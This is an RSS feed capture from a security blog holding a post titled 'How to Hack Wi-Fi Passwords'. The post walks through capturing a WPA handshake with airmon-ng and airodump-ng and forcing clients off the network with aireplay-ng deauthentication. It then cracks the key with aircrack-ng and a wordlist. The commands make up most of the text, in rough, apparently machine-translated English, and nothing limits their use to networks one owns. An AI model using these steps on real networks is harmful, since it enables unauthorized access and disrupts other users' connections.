how to hack wifi password using cmd arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me cypm! Thu, 19 Apr 2018 19:49:45 +0000 tr hourly 1 https://wordpress.org/?v=6.0 https://canyoupwn.me/wp-content/uploads/2016/02/cropped-Başlıksız-1-32x32.png how to hack wifi password using cmd arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me 32 32 EN | How to Hack Wi-Fi Passwords https://canyoupwn.me/en-how-to-hack-wi-fi-passwords/ https://canyoupwn.me/en-how-to-hack-wi-fi-passwords/#respond Mon, 01 Feb 2016 18:02:42 +0000 http://canyoupwn.me/?p=227 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Speaking of business by capturing the theoretical part of the handshake between the client router will try to find the password through wordlist at hand.   airmon-ng check kill This command kill procces.   airmon-ng We are viewing WiFi units.   airmon-ng start [monitor interface] View a modem interface by typing the name we have achieved […]

EN | How to Hack Wi-Fi Passwords Mustafa Kaan Demirhan

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Speaking of business by capturing the theoretical part of the handshake between the client router will try to find the password through wordlist at hand.

 

airmon-ng check kill

This command kill procces.

1

 

airmon-ng

We are viewing WiFi units.

2

 

airmon-ng start [monitor interface]

View a modem interface by typing the name we have achieved in the previous screen in the command interface to monitor active part we make .

3

 

airodump-ng [monitor interface]

We are starting to crawl.

5

 

  • At the end of scan we takes “BSSID” and “CH” values.

6

 

airodump-ng -c [channel] –bssid [bssid] -w [file storage location] [monitor interface]

We are entering “BSSID”, “Channel” and “file storage location” values.

7

 

aireplay-ng –0 2 –a [router bssid] –c [client bssid] [monitor interface]

In the previous step we find the target depent clients and fill the “router bssid”, “client bssid” and “monitor interface” parameters.

9

 

aircrack-ng -a2 -b [router bssid] -w [path to wordlist] [path the handshake location]*.cap

After catching handshake we fill the paremeters and comparison begins. If we find the key we see the following screens.

12

EN | How to Hack Wi-Fi Passwords Mustafa Kaan Demirhan

]]>
https://canyoupwn.me/en-how-to-hack-wi-fi-passwords/feed/ 0